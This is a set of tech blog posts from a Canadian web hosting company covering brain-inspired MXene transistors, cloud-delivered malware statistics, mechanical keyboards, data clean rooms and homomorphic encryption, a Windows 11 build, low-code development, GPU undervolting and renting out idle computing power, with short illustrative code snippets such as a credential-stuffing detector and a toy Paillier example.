Brain Synapse Function Possibly a Part of the Next Generation of PCs

100 billion is an incredibly big number, and yet a fully developed human brain can contain up to 100 billion neurons as part of the extensive neural network that provides the brain with the framework it needs to be the amazing mega processor that it is. Much of the focus with A.I. in computers has been on replicating the function of the human brain as closely as possible, and to date that has happened with varying measures of success, along with difficulty in defining the criteria for measuring it.

The key conduits in a brain’s neural network are synapses, the bridges between cells along which bioelectrical impulses carry cognition, impulses, feelings – pretty much anything and everything rooted in mental function. Those impulses have their roots in the different cortex centres of the brain, and in much the same way signals are relayed in the chips of computers and similar devices. Up until now the relaying function of these chips lost something of its power and authenticity, but that may be a shortcoming with a fix arriving soon.

New developments in chips modeled after the brain’s neural network are really making waves based on what they can do to expand the capabilities of computing devices. Here at 4GoodHosting it goes without saying that this is a topic of interest for any Canadian web hosting provider, or any other type of provider with an inherent interest in making devices capable of more while keeping them suitably compact and usable.

It’s certainly something that can be beneficial to everyone, especially when you think about what it’d be like to have computers that are as sharp as what we’re all lucky enough to have between our ears. It may be a reality in the not-too-distant future, and so that’s what we are going to look at this week.

World’s First Electrochemical 3-Terminal Transistor

All of this has to do with a new material that has been developed for an electrochemical 3-terminal transistor manufactured with 2D materials – the first of its kind. The key component here is a titanium carbide compound called MXene that takes classical transistor technology into a whole new stratosphere of transmission possibilities.

This is what allows it to function more in line with how a brain would, maintaining signal integrity and allowing for all the nuanced complexity it needs to have. With these new chips the electrochemical random access memory (ECRAM) behaves as a synaptic cell in an artificial network, establishing itself as a 1-stop shop for taking in data and then processing and storing it. Computers equipped with chips built this way could rely on components that can have multiple states, and perform in-memory computation in ways that would make current capabilities seem pedestrian at best.
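The in-memory computation idea can be sketched in a few lines. In an analog crossbar, each memory cell’s conductance acts as a stored weight, and driving the rows with input voltages yields column currents that are the multiply-accumulate results – the math happens where the data lives. A minimal Python illustration of that arithmetic (the conductance and voltage values here are purely made up for the demo):

```python
# Conductance matrix G (siemens): each cell stands in for one
# multi-state ECRAM device storing an analog weight.
G = [[0.002, 0.001],
     [0.003, 0.004],
     [0.001, 0.002]]

V = [0.5, 1.0, 0.25]  # input voltages applied to the rows

# Ohm's law + Kirchhoff's current law give the column currents:
# I_j = sum_i V_i * G[i][j], i.e. a matrix-vector multiply "in memory".
I = [sum(V[i] * G[i][j] for i in range(len(V))) for j in range(len(G[0]))]
print(I)
```

In a real device this multiply-accumulate happens in a single analog read step rather than a loop, which is where the energy savings come from.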

Leading to Even More

The further belief among computing science experts is that MXenes could be fundamental when it comes to developing neuromorphic computers that are closer in operation to human brains and immensely more energy efficient than today’s traditional computers – in some cases thousands of times more energy efficient, to go along with more detailed and finer computational abilities. A good number of developers will be familiar with CMOS wafer assemblies where layers of 2D materials are integrated on silicon, and these new chips will do much the same with the 3-terminal transistors. What this will be is a true hybrid integration using the same back-end-of-line processes.

What can be expected? For starters, these super chips would have write speeds upwards of 1000x faster than any ECRAM built to date. If 2D ECRAMs were scaled to nano dimensions, their sub-nanosecond switching would make them as fast as the transistors in today’s computers, so it’s reasonable to think they can be fused into our current computers using the CMOS technology process.

That’s due to the 2D transistor materials being entirely compatible with CMOS fabrication processes, and the belief is that within a decade users may be able to fabricate special-purpose computer blocks where memory and transistors merge, making them at least 1000x more energy efficient than the best computers we have today. AI and simulation tasks could even see a million-fold energy efficiency gain for certain algorithms. These new chips are eventually going to be seen in cloud computing services like web hosting and website builders.

The first commercial products with this kind of mega-powerful chip in it may still be a long way off, but industry experts are saying we might see offerings becoming available before the end of the 2020s.

Cloud Apps Responsible for the Bulk of Malware Downloads

Web security has improved in leaps and bounds over recent years, but as is always the case the interests on the other side of the fence have made their own advancements. Many people are inclined to ask what exactly is in it for the people who create malware and put it out there to infect a person’s computing device, but as has been determined – and not surprisingly – it’s all about money like anything else. There’s a very complex network of interests there, and the long and short of it is that people benefit, very underhandedly, from having your computer, notebook, or mobile compromised.

And so it is that much of what makes the Cloud the godsend it has been for digital professionals is also what makes it the #1 risk factor for being infected with malware. In many ways it is a classic example of having no choice but to take the bad with the good, and it appears the competition between malware makers and cyber security experts is going to continue full tilt for the foreseeable future.

Here at 4GoodHosting we’re big fans of the Cloud in the same way any good Canadian web hosting provider with a clear view of digital advances would be. Further, you can’t stop progress, and there’s no debate we’ll be looking to get more out of cloud computing so that extensive physical storage isn’t required. So yes, we are all very much taking the good with the bad these days, and many people will have already had one or more unpleasant experiences with malware.

Let’s look at this finding that most malware downloads are delivered via the cloud, why that might be, and what the potential ramifications of it all are for the average business or organization.

2/3 of All for 2021

A recent Netskope report covering 2021 found that no less than two-thirds of malware downloads originated in cloud apps. This puts a spotlight on the continued growth of malware and other malicious payloads that make their way to unsuspecting users through cloud applications. As you’d expect this was up markedly from the percentage for 2020, and what it makes clear is that attackers are having more success infecting their victims with malware.

What this creates is the need for better Cloud security, and there’s one particularly popular resource where it may be needed more than anywhere else – Google Drive. Given the popularity of Google’s flagship cloud computing resource, that isn’t going to be well-received news for its devotees. But it is what it is, and of course the popularity of the app and the sheer number of people using it is a big part of why it’s #1 for malware infections.

It’s interesting to note that it usurped Microsoft OneDrive for the dubious title. OneDrive was the number one source of malware infections the year previous, although it’s hard to suggest a major shift in user preferences was behind the change.

19 to 37% Jump

The increase in malicious Office documents was from 19% to 37% according to the report, and the size of the increase is large enough to suggest far-reaching cloud application security risks. It also indicated that more than 50% of all managed cloud app instances were targeted by at least one credential attack over the course of the last year, independent of whether that attack succeeded or was blocked. The number of attempts suggests there are more bad actors out there than ever before building malware and putting it in a position to be distributed via the Cloud.

The reality now is that cloud-delivered malware is more common than web-delivered malware. For 2021, malware downloads originating from cloud apps made up 66% of all malware downloads in comparison to traditional websites, a figure up 46% from the beginning of 2020. This is alongside Microsoft Office documents moving up to account for 37% of all malware downloads by the end of 2021.

Some of the Microsoft Office malware – including the well-known Emotet malspam campaign in 2020’s 2nd quarter – triggered a rush of malicious Microsoft Office documents designed by copycat attackers riding the coattails of the Emotet campaign. Another interesting catch is that upwards of 50% of managed cloud app instances are targeted by credential attacks exclusively. And the reason for that? Credentials gained underhandedly can be sold, and that gets back to what we started with in asking why people do this.

Try Until Success

What these malware attackers and their accomplices do is try common passwords and leaked credentials from other services in order to obtain access to sensitive information stored in cloud apps. It’s also interesting to note that some 98% of attacks come from new IP addresses, indicating that’s very much a part of the M.O. in order to stay out of sight as much as possible.
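That pattern – failed logins against many different accounts from a single fresh IP address – is detectable in login telemetry. Here is a hedged Python sketch of the idea; the log format, addresses, and threshold are invented for illustration, not any particular product’s schema:

```python
from collections import defaultdict

# Hypothetical login log entries: (source_ip, username, succeeded)
attempts = [
    ("203.0.113.9", "alice", False),
    ("203.0.113.9", "bob", False),
    ("203.0.113.9", "carol", False),
    ("198.51.100.4", "alice", True),
]

# Credential stuffing tends to fail against many *different* accounts
# from one source address, so count distinct failed usernames per IP.
failed_users = defaultdict(set)
for ip, user, ok in attempts:
    if not ok:
        failed_users[ip].add(user)

# Flag any IP that failed against 3 or more distinct accounts.
suspects = [ip for ip, users in failed_users.items() if len(users) >= 3]
print(suspects)  # ['203.0.113.9']
```

Real detection systems add rate limits, reputation feeds, and time windows on top of this, but the distinct-victims-per-source signal is the core of it.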

We also know from this report and others that corporate data exfiltration is on the rise. Increasing numbers of employees take data with them when they leave an employer, and this report found that across 2020 and 2021 an average of 29% of departing employees downloaded more files than usual from managed corporate app instances. Another 15% of users uploaded more files to personal app instances in their final 30 days of employment.

This is noteworthy because it goes to show that effective cybersecurity can’t be 100% digital exclusively; better and more secure business practices need to be part of the protective equation too. Which is important, because as we’ve discussed, all the goodness of cloud computing and eliminating the need for physical storage isn’t going anywhere.

Next Generation Mechanical Keyboards Sure to be a Hit

Even if you don’t have the most dextrous fingers or type especially quickly, you are probably like everyone else in that doing your job likely involves typing on a keyboard. But these days, as we all know, keyboards are for so much more than just pressing keys to enter text, and we use them in many other ways to make personal computing more efficient. Customization and greater functionality is the name of the game with all computing components. Mechanical keyboards offer this and they’re not new to the market, but until recently they’ve been quite expensive and not as widely available.

That’s soon to change, and nearly everyone who uses a keyboard for work or on a regular basis is likely going to be quite thrilled with the new mechanical keyboards. They will likely stay on the pricey side, but for some people it will be a price well worth paying if it increases the productivity of their work day and gets rid of nuisances they found with their old conventional keyboard.

This makes the cut as newsworthy here at 4GoodHosting in the same way we imagine it would for any other good Canadian web hosting provider, as it’s something that nearly everyone can relate to. That’s going to be true if you’re anything from a web master to a data entry clerk or a university student with plenty of papers to write.

So what’s the fuss and what can be expected with this new and vastly improved generation of mechanical keyboards?

All About Customization

The ability to customize these keyboards is what makes them so great. What they offer is a level of personalization that can transform everyday typing into a much more pleasurable experience while also facilitating greater productivity on your part.

The best of the features with new-technology mechanical keyboards starts with the keycaps that sit on top of switches. The switches communicate key presses to the PCB, and when contact is made between a switch and the PCB it is the PCB that transmits the input to the computer. This allows the key to deliver much more detailed digital information if that is what it is formatted to do.
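For a sense of what “communicating key presses to the PCB” involves, keyboard firmware typically scans a switch matrix: it energizes one row at a time and reads which column lines show contact, then maps each (row, column) position to a keycode. A toy simulation of one scan pass in Python – the 2x3 layout and keymap are invented for the example:

```python
# Invented keymap for a tiny 2-row by 3-column switch matrix.
KEYMAP = {(0, 0): "Esc", (0, 1): "1", (0, 2): "2",
          (1, 0): "Tab", (1, 1): "Q", (1, 2): "W"}

def scan(pressed):
    """One scan pass; 'pressed' is the set of (row, col) switches
    currently making contact with the PCB."""
    events = []
    for row in range(2):        # firmware drives each row in turn
        for col in range(3):    # and samples every column line
            if (row, col) in pressed:
                events.append(KEYMAP[(row, col)])
    return events

print(scan({(1, 1), (0, 2)}))  # ['2', 'Q']
```

Real firmware repeats this scan hundreds of times a second and debounces the contacts, but the row/column sweep is the essence of how a switch press becomes digital input.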

Next up, these keyboards have stabilizers, and while not functionally superior on their own they do offer a better user experience in the way they allow longer keys (the spacebar, for example) to have a more even feel across their length when pressed. These keyboards also have a metal frame plate that gives them more stability and solidity, the value of which will immediately register with those of us who type well above 100 wpm.

Other Favorable Features

The printed circuit board on these keyboards is a big part of their superior functionality too. You can customize these even further (for a higher price, of course) with up to quadruple switches and super durable aluminum housing. The key customization options are huge for users who may not use English primarily and instead have a native language that relies on a script that doesn’t work well with a conventional keyboard layout.

With a custom mechanical keyboard you’re able to opt in and out of whatever it is you like, or don’t like. You can even vary what type of switch or keycap you use for specific keys and experiment until you find the feel and responsiveness that’s optimal for you.

Mechanical keyboards mean easy maintenance too, as the ease of customization means replacing failing elements is much easier than it would be with a conventional keyboard. This is especially true if they have hot-swappable keys, and most of them do.

Less Expensive Upgrades Too

With a custom board, changing out the switches or keycaps is more affordable, and it’s relatively inexpensive to swap them for a whole different set. Industry hardware experts say it is likely that in the not-too-distant future there will be generic parts compatible across different makes, and the manufacturers have something to gain here too – users tend to be more brand loyal when they have right-to-repair on these units.

If you’re reading this on mobile you can skip the next suggestion, but anyone on a desktop or notebook can look down at the keyboard in front of them and think about how it could be improved. In a short while from now you may be evaluating how successfully that has been done for you.

Data Clean Room Software a Big Development for Brands & Businesses

It was inevitable that data would eventually become Big Data, and the increasingly digital nature of being in business and doing business is ensuring that trend just becomes more and more pronounced all the time. The catch has been in making data available to partner organizations while still safeguarding the privacy interests anyone may have in the data being shared, and one of the more interesting things on the horizon early in 2022 is data clean room software.

With data leaks and the fallout of them being so often in the news it’s easy to see why we can relate to the need for this here at 4GoodHosting. Like any quality Canadian web hosting provider we have smaller level customers who may well see the promise of this for their online business or venture too. Many companies are in the process of looking for equally effective ways to collect, share and analyze data without compromising on privacy.

This also goes well beyond compliance, as a company that can incorporate this new technology and then turn to any user interest group and give them 100% assurance of data security is going to be at an immediate advantage. Demand for such a resource has been growing over recent years, and it may be that with data clean rooms it’s about to become attainable and commonplace.

So what is the hype about, and what exactly is a data clean room? That’s what we’re going to look at with this week’s entry.

What’s a Data Clean Room?

A data clean room is a piece of software that allows brands and their partners to share data and gain mutual insights without compromising the privacy of users’ data. Specifically, it means not sharing any personally identifiable information or raw data with one another, and in this way the data clean room serves as something of a neutral 3rd party – much like Switzerland, if you wanted to use a geopolitical analogy.
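One way to picture the “no raw data leaves” rule is a query gate that only ever returns aggregates, and suppresses any group small enough to risk identifying individuals (a k-anonymity style threshold). A hedged Python sketch – the threshold, row format, and function name are illustrative, not any vendor’s actual API:

```python
K_THRESHOLD = 5  # illustrative minimum group size before results are released

def aggregate_query(rows, group_key, k=K_THRESHOLD):
    """Return only per-group counts, never row-level data, and drop
    any bucket smaller than k so individuals can't be singled out."""
    counts = {}
    for row in rows:
        key = row[group_key]
        counts[key] = counts.get(key, 0) + 1
    return {group: n for group, n in counts.items() if n >= k}

rows = [{"city": "Toronto"}] * 7 + [{"city": "Kelowna"}] * 2
print(aggregate_query(rows, "city"))  # {'Toronto': 7}
```

The two-person Kelowna bucket is withheld entirely: both partners learn the safe aggregate, and neither sees the other’s underlying records.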

At present there are 2 primary types of data clean room solutions available in the ad tech industry: walled garden solutions and independent solutions, and both have their advantages and drawbacks.

The question then becomes how this benefits a brand in particular, and to answer that we need to look at what consumer expectations have grown to become. What we do know is that consumers have become accustomed to a certain type and level of user experience when it comes to brand interaction – most notably seeing personalized, relevant content within an app, of the type which has to this point been facilitated by access to user-level data.

Prime examples of this are cookies on the web or identifiers on mobile devices.

Unfortunately, exchanging user-level data in this way has created the privacy problem that exists today. Consumers are rightfully asking to know how their data is being shared, and with data clean rooms the answer can be very different when it is being given honestly.

Experience Meeting Privacy without Compromise

AppsFlyer’s Privacy Cloud is a good example of this technology having been introduced, and with it and other data clean room solutions consumers will still get the great value and experience they expect from brands – but without any privacy concerns around how their data is being used. The catch is that any compromise on either end of the spectrum – customer experience or privacy – is going to be even more detrimental now, simply because of how inflexible people are about both.

All of this takes on greater relevance when we consider that 3rd-party cookies are on their way out, and data clean rooms are already being earmarked to fill a big part of that role so that user experiences can be optimized without sensitive data being put at risk. This is all because data exchanged between brands and partners continues to be the basis for accurate and actionable measurement.

It’s the type of measurement that enables both sides to grow their businesses and give better experiences to end users. Up until now, however, this data exchange has been done based on user-level data only. What the data clean room does is provide a solution that maintains the great value and customer experience currently enabled by cookies, identifiers, and other user-level data – but without introducing the privacy concerns that consumers couldn’t look past previously.

Additional Use Cases

Data clean rooms are already in use for operations in various industries. The way they provide secure environments where multiple parties can collaborate on sensitive and restricted data sets makes them very appealing, and you’ll find them in healthcare and life sciences, fintech (financial technology), insurance, and other domains where sensitive data such as personally identifiable information (PII) has to be shared between multiple parties to perform analyses and generate insights.

Using AppsFlyer’s Privacy Cloud as an example again, what it does is let customers and partners stay in compliance with the various privacy regulations and guidelines while still getting the accurate insights they need to operate their business with maximum efficiency and best facilitate its growth.

And while existing data clean rooms may have certain limitations, most are still going to have a lot of appeal for many. It should be said, though, that data clean rooms from walled gardens have no cross-channel access, resulting in 1st-party data mostly being matched against their own data sets. Others may be limited to 1st-party data granularity as well as smaller partner ecosystems.

The biggest issue, though, is that these solutions often lack the expertise to generate the insights a marketer needs, and there is almost always a need for aggregated reporting that is well suited to both business users and marketers.

Introducing Homomorphic Encryption

Homomorphic encryption enables the accurate generation of aggregated insights about encrypted data without decrypting it at all. Because the data remains fully encrypted the entire time, it becomes a ‘zero trust’ technique where even the operator of the data clean room isn’t able to access the plain data. It uses a public key to encrypt the data, and of course that’s nothing out of the ordinary. What is different is how homomorphic encryption uses an algebraic system to allow functions to be performed on the data while it remains encrypted.

Once that’s done then only the individual with the matching private key can access the unencrypted data after the functions and manipulation are complete. This means data remains secure and private even when someone is using it.
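To make the “compute on ciphertexts” idea concrete, here is a toy version of the Paillier cryptosystem, a well-known additively homomorphic scheme: multiplying two ciphertexts yields an encryption of the sum of the plaintexts, so an aggregate can be computed without ever decrypting the individual values. This is a teaching sketch with tiny fixed primes – real deployments use vetted libraries and much larger keys:

```python
import math
import random

def L(x, n):
    """Paillier's L function: L(x) = (x - 1) / n."""
    return (x - 1) // n

def keygen(p, q):
    n = p * q
    lam = (p - 1) * (q - 1)       # simplified variant: lambda = phi(n)
    mu = pow(lam, -1, n)          # modular inverse (Python 3.8+)
    return (n, n + 1), (lam, mu)  # public (n, g=n+1), private (lam, mu)

def encrypt(pub, m):
    n, g = pub
    while True:                   # random r coprime to n
        r = random.randrange(2, n)
        if math.gcd(r, n) == 1:
            break
    return (pow(g, m, n * n) * pow(r, n, n * n)) % (n * n)

def decrypt(pub, priv, c):
    n, _ = pub
    lam, mu = priv
    return (L(pow(c, lam, n * n), n) * mu) % n

pub, priv = keygen(1789, 2003)    # toy primes; never do this in production
c1, c2 = encrypt(pub, 12), encrypt(pub, 30)
c_sum = (c1 * c2) % (pub[0] ** 2)  # homomorphic addition on ciphertexts
print(decrypt(pub, priv, c_sum))   # 42
```

Neither ciphertext is ever decrypted on its own; only the holder of the private key can open the final aggregate, which is exactly the property a clean room operator wants.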

Bigger picture, data clean rooms should make it easier for marketers to understand the real impact of their investments, with more concrete evaluations of conversions and incrementality-based solutions using test and control groups to isolate the affected variables. This will help marketers optimize their efforts without putting the shared data necessary for that into jeopardy if there’s any inherent security flaw or risk in the infrastructure.

Coming Windows 11 Update Set to Make OS Run Better on Lesser Hardware

Even if you’re a Mac person it is not difficult to see why the Windows OS is the dominant one across the board. And the truth is most people are not firmly in one camp or the other when it comes to their computing devices of choice. Mac is always going to be preferable for people who use theirs for creative purposes, but PCs hold the same appeal for people whose computing is all business and work related for the most part.

One of the things that has been noteworthy recently is how some companies – Apple most notably – are now starting to make replacement parts available as part of the Right to Repair movement that is growing in strength due to how much e-waste is being generated and how electronic devices of all sorts are being made with planned obsolescence in mind. Microsoft isn’t doing the same with parts, but one of the big aspects of the coming Windows 11 update is that the OS is going to be able to run better on older and more low-end hardware.

In that sense it’s in line with the same ideas, and of course this is a good thing. There are so many possible examples as to why, but look no further than the thousands of old PCs repurposed for education in 3rd world countries and the like. This is not the only aspect of the update that should be talked about, but it is one we can definitely support here at 4GoodHosting, and we’d imagine any good Canadian web hosting provider would feel similarly.

More on Build 22526

Right now, Windows 11 Build 22526 is only available to members of the Microsoft Insider early access program, but it introduces a number of fixes and enhancements. Many are relatively minor, but one worth mentioning is how Microsoft is using the latest build to experiment with a new approach to indexing file locations. They hope this will help users hunt down important files more quickly in File Explorer.

The reason we mentioned this one is that despite the performance improvements seen over the course of recent updates, File Explorer is still just as sluggish and prone to crashes as ever. And for many, the worst of the frustrating issues is with the search functionality. It often takes far too much time to return relevant results, especially if the person stores a large number of files on their local hard drive.

What’s going to change is that the newest update will make sifting through large quantities of files quite a bit faster, and the idea is that this will allow people on lesser devices to be more productive with them. Users running Windows 11 on older, less powerful hardware will now be less likely to suffer performance dips and longer load times.
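The principle behind a change like this is the classic search trade-off: pay an indexing cost once up front so that each later query is a cheap lookup instead of a fresh scan of the drive. A toy illustration in Python – the paths and tokenizing rules are invented, and Windows’ actual indexer is of course far more sophisticated:

```python
from collections import defaultdict

# Invented sample of file paths that would normally come from walking the disk.
paths = ["C:/docs/tax_2021.pdf", "C:/docs/notes.txt", "C:/music/mix.mp3"]

# Build the index once: map each lowercase name token to its full paths.
index = defaultdict(list)
for p in paths:
    tokens = p.lower().replace("/", " ").replace(".", " ").replace("_", " ").split()
    for token in tokens:
        index[token].append(p)

# A search is now a dictionary lookup, not a rescan of every path.
print(index["tax"])  # ['C:/docs/tax_2021.pdf']
```

On a slow laptop drive, the difference between a hash lookup and re-walking tens of thousands of files on every keystroke is exactly the kind of gain lower-end hardware benefits from most.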

Other Improvements

Superior file indexing is not the only improvement ushered in with Windows 11’s latest build. Other upgrades include support for wideband speech when using Apple AirPods, which is likely to improve audio quality for voice calls, and a new and improved approach to the familiar Alt + Tab hotkey functionality. Enterprise customers will also like how Microsoft has enabled its Credential Guard service by default; the way it shields sensitive data behind a layer of virtualization-based security is something that’s very needed in today’s digital operating space for businesses.

In closing we should mention that the latest Windows 11 build is currently only available to Dev Channel members, as further fixes are on the way and these individuals have opted to receive the most unstable features in advance. It is not known when the new features will make their way into a public build, but signs are promising for anyone who’s had issues with how well an older PC works with File Explorer.

Slowing the Low Code Hype Train

Here we are with another new calendar year opened up, and you’ll be forgiven if January ’22 has you feeling the same as you did at this time last year – some sense of bewilderment at how developer technologies and methodologies are expanding in leaps and bounds. Part of that has been low-code technology, which was forecast to have gains in application of around 22% for 2021 and by all indications did at least that. It’s also estimated that by 2025, 70% of new applications will be built with low-code or no-code technologies.

What we have on the plate today is 3rd-generation low-code technology that has improved on the 2 preceding generations. It gives enterprises the ability to build anything from the simplest to the most complex applications and scale them to whatever extent needed, without limitations. It’s also known for providing the built-in controls and functionalities required for enterprise governance while fostering more collaborative team working environments too.

It is conducive to the type of digital applications enterprises need to be able to create quickly and then easily adapt as their needs change. Here at 4GoodHosting we imagine we’re like any good Canadian web hosting provider in that we’re able to see the real relevance in that, and accordingly why there’s so much hype about low code and the applications built around it.

But perhaps there’s reason to pull on the reins a bit there.

The Pros

Low code can be helpful for building an MVP and fleshing out concepts within a small scope, with precise product requirements and an understanding that any scaling will be limited. But many times as a project progresses there is the need to upgrade the processes. Without the right low-code solution your ability to scale is very limited, and it can also be more costly.

Then, from the developer’s perspective, choosing low code to complete small-scale projects and prototypes or build basic solutions is almost always faster and comes with fewer hiccups. Keep in mind, though, that most professionals will prefer to code from scratch when working on complex projects on account of the flexibility that provides. While the chance always exists that a low-code platform won’t allow you to create a product meeting new or changed requirements, that’s usually no deterrent.

Scalability really is the key benefit of low-code development, and the opportunity for and cost of horizontal and vertical scalability are primary factors when a vendor is being chosen. The benefits for accommodating changing numbers of daily active users, available features, storage, and expanded computing power are considerable and weigh heavily in favour of this type of development.

It also allows you to avoid being overruled by AI when a site experiences a large influx of visitors and you would otherwise have access limited and / or be forced to upgrade. This is a huge issue in the SaaS sector right now, and it’s one that’s pushing developers there to have greater interest in going low-code moving forward.

The Cons

Starting with the drawbacks of building with low code: the first is extensive training requirements. There’s usually a lot that goes into implementing a low-code solution, and that usually manifests itself in significant delays in deployment. For many people, foreseeing this is what leads them to stick with agile development in order to get to market in the timeframe that’s been envisioned for the product.

The next issue is timeframe variances related to factors other than development tools and methodologies – ones that vary from weeks to months and depend on the quality of the available documentation and support. The fact there isn’t an industry standard means every platform has its own unique system. If an industry standard did exist that would change things instantly, but of course the question is who would define it, based on what criteria, and with what authority to do so?

Troubleshooting is difficult with low-code development too. When something goes wrong, a successful remediation will depend on the quality of the documentation, the response speed, and the competence of the dev team and their support. Debugging a program built with low code may be difficult or flat-out impossible, and vendor lock-in is a possible negative as well if the solution is not compatible with any competitor or similar provider.

You may need to depend on the vendor’s platform to work, and you may only be able to make use of it as a backup. Plus, migrating to another service is often nearly impossible – you may well have to start over again from scratch.

One Tool Like Others

The simplicity and scalability of low code make it appealing, but it shouldn’t be seen as the be-all solution to be rolled out by default for every task. Make sure you have a deep understanding of the niche you’re working in so you know the demands on the product you’re building and how they might be tested against a vendor’s capabilities.

Pros & Cons for Undervolting Graphics Cards

Hoping that everyone is enjoying the holidays, had a good Christmas, and has an enjoyable NYE 2022 on deck. During the Christmas holidays a lot of people find time for entertainment that’s not as easily found during the rest of the year. For some people that entertainment is best enjoyed via their computer, and for many there’s nothing better than games. They’ve come a long way over the last decade-plus, and usually in order to get all the visual pop and immersive experience the game developers want you to have, you need a good GPU.

Lots of people are perfectly fine with the one that came in their desktop, and not many of them will be the type inclined to perform invasive surgery on computing devices in the first place. For others with the know-how and no hesitation about performing ‘tweaks’, it is possible to make small changes to computer components that will alter how they function. One of these procedures that gamers will probably at least have heard of is undervolting the GPU. To describe it plainly, it means restricting the power the card has access to in order to gain specific performance benefits.

This is not something that would generally be among the familiarities for a Canadian web hosting provider, but here at 4GoodHosting we are good at identifying what might be of interest for people who are tech-savvy in this way, and it turns out that undervolting isn’t especially difficult to do. So it’s something that might be possible for you if you’re an avid gamer, and what we’ll do here with the last entry for 2021 is talk about advantages and disadvantages to undervolting graphics cards.

Efficiency Boost

Your GPU is going to have a few important calibrations that are open to manual adjustment with software like MSI Afterburner. These include the power limit, core and memory clocks, plus the voltage. These all work in unison to provide the performance and power expected from out-of-box operation.

So what exactly is undervolting? Simply, it is a reduction of the voltage your GPU has access to and the primary aim is to maintain the performance associated with stock settings while at the same time boosting efficiency. Undervolting takes specific aim at power draw and heat as areas where improvements can be made.
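To illustrate why lowering the voltage pays off so much, dynamic power in a chip scales roughly with voltage squared times clock frequency. Here’s a toy sketch of that relationship; the voltages, clock speed, and constant are made-up illustrative numbers, not measurements from any real card:

```python
def dynamic_power(voltage_v, clock_mhz, k=0.25):
    """Toy dynamic-power model: P ~ k * V^2 * f.
    k is an arbitrary illustrative constant, not a real GPU figure."""
    return k * voltage_v ** 2 * clock_mhz

stock = dynamic_power(1.05, 1900)        # hypothetical stock voltage/clock
undervolted = dynamic_power(0.90, 1900)  # same clock, lower voltage

savings_pct = (1 - undervolted / stock) * 100
print(f"Power saved at the same clock: {savings_pct:.0f}%")
```

Because of that squared term, even a modest voltage drop at an unchanged clock yields a disproportionate reduction in power draw and heat, which is exactly the trade undervolting is after.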

The first question then is this: if a GPU is able to run better at a lower voltage, why wouldn’t the manufacturer build it with this in mind? The answer is that silicon quality varies with each individual GPU, and some chips will tolerate different voltages and clocks better than others. Standard settings are aligned with whatever is known to be the average tolerance.

The most noticeable differences will be with a GPU that’s built to be power hungry, and the Nvidia RTX 30-series Founders Edition cards are among them. Undervolting a card like this may offer many improvements, especially in demanding applications. A lower-power GPU, by contrast, puts out less heat to begin with, so you’ll have less to gain from undervolting it.

Pros / Cons for Undervolting

We should start by saying that most of the time it will actually be best to leave your GPU at stock settings. Some users will instead choose an automatic overclocking tool as a cost-effective and simply implemented way of regulating graphics card performance.

Pro 1: Lower power consumption means lower heat. It also means a reduced power bill, even if it’s not much lower. Less heat can also equate to better thermal performance for surrounding components like the CPU. Modern GPUs tend to come with plenty of power, so undervolting can be very beneficial for mitigating the effects on your PC ecosystem. Plus your power supply will be less stressed.

Con 1: You’ll need to spend time familiarizing yourself with the settings on the GPU. While undervolting is not especially difficult, it does require some knowledge and the ability to tinker effectively, and neglecting that may mean you do permanent damage to the GPU.

Pro 2: Familiar software like MSI Afterburner makes it free to do, and generally it’s not too risky. Keep in mind as well that undervolting may also help prolong the life of your GPU because it will be under less thermal stress over time.

Con 2: Further tinkering may be required in the future. New driver updates or changing ambient temperatures are two of the reasons you may sometimes have to go in and adjust your settings for optimal performance.

Pro 3: Undervolting is ideal when you’re fitting a powerful GPU into a small form factor enclosure, because it makes it a much better experience. Small cases are usually more restrictive for heat dissipation, so you’ll enjoy better thermals in these smaller spaces while performance isn’t compromised like it might be with a CPU that hasn’t been undervolted.

Con 3: You may end up applying incorrect settings without being aware of it, with poor performance as a result. If insufficient voltage reaches the GPU or the setting isn’t properly applied, there may be overall instability and reduced frame rates. Double-checking and testing your GPU performance to ensure it’s improving with voltage changes is always a good idea.

Pro 4: Less noise. The lower voltage will make it so that the GPU fans can spin at lower RPMs with the accompanying reduced heat. This also means less power is needed for the fans, and that keeps the entire system performing at a lower noise level.
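The testing mentioned in Con 3 is usually done by stepping the voltage down in small increments and re-running a stress test at each step, keeping the lowest value that stays stable. A minimal sketch of that loop, where `stress_test` is a stand-in for an actual benchmark run (all names and values here are hypothetical):

```python
def find_lowest_stable_voltage(stress_test, start_mv=1050, floor_mv=800, step_mv=25):
    """Walk the voltage down in steps, keeping the last value that still
    passes the stress test. stress_test(mv) stands in for a real benchmark
    run (e.g. a looped game or synthetic load) and returns True when no
    crashes or artifacts were observed at that voltage."""
    best = start_mv
    mv = start_mv - step_mv
    while mv >= floor_mv and stress_test(mv):
        best = mv          # this step was stable, so it becomes the new best
        mv -= step_mv      # try the next step down
    return best

# Toy stand-in: pretend this particular chip happens to be stable down to 900 mV
print(find_lowest_stable_voltage(lambda mv: mv >= 900))
```

In practice the “stress test” is a long benchmark session rather than a function call, and a passing step is typically re-verified over hours of use before being trusted, but the search logic is the same.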

Rent Out Computing Power for Access to Apps and Services

There’s the old expression ‘take only what you need’, and it’s good advice to follow in all sorts of situations. It’s easy enough to follow at an all-you-can-eat buffet once you’ve eaten all you can, but when it comes to the processing power in your computer at home, you get what was given to you when the device was put together. Some people put the entirety of that processing power to work for them, but most people don’t use anywhere near all of it. And in truth the majority of people may not even know what it is they actually have at their disposal.

Some will though, and it’s these people who will want to take note of a new decentralized Internet platform that will let people pay for their apps and services by making their idle computing power available to those who could put it to use. As a quality Canadian web hosting provider, this is something that resonates with us here at 4GoodHosting, because like any host we can relate to what it’s like to have real constraints in this area, and in the industry there’s been much roundabout talk about whether something like this might become possible someday.

It has made a lot of sense for a long time, but like many things it takes time to get the wheels sufficiently in motion to see things start to happen. But that’s what’s happening now with Massive, an app monetization startup that’s set to make some serious waves.

Smart Decentralization

Massive has just recently closed an $11 million seed round, which will let it move forward with a monetization software development kit able to support the project: a small yet noteworthy step in decentralizing the internet and making it possible for people to pay for apps using their idle compute power.

This is an impressively unique potential solution, one that will benefit the individual consumer but also improve how app developers and service providers make money for the work they do. As it is now they usually charge users money, and it’s fairly standard to have a one-time app download fee or subscription services that come with a monthly charge. There are some who want to make their work free to the public and will set up their compensation by implementing on-screen ads, and nearly everyone will recognize the type from the apps they use.

This is especially common for mobile games, and sometimes it is preferable because upfront costs often turn off new customers. But ideally most people would enjoy an ad-free experience, and that may be what’s soon to be possible if people have the means of renting out their CPU power.

Expanding on Distributed Computing

What is being proposed here is taking the concept of distributed computing – utilizing extra CPU cycles on otherwise idle machines – and reinventing it as a legitimate payment method. Looking at how it works, it is not unlike how individuals can rent out their unused vehicles and homes on Turo and Airbnb. The unused compute power is exchanged for a passive means of paying for apps and services already being used and enjoyed.
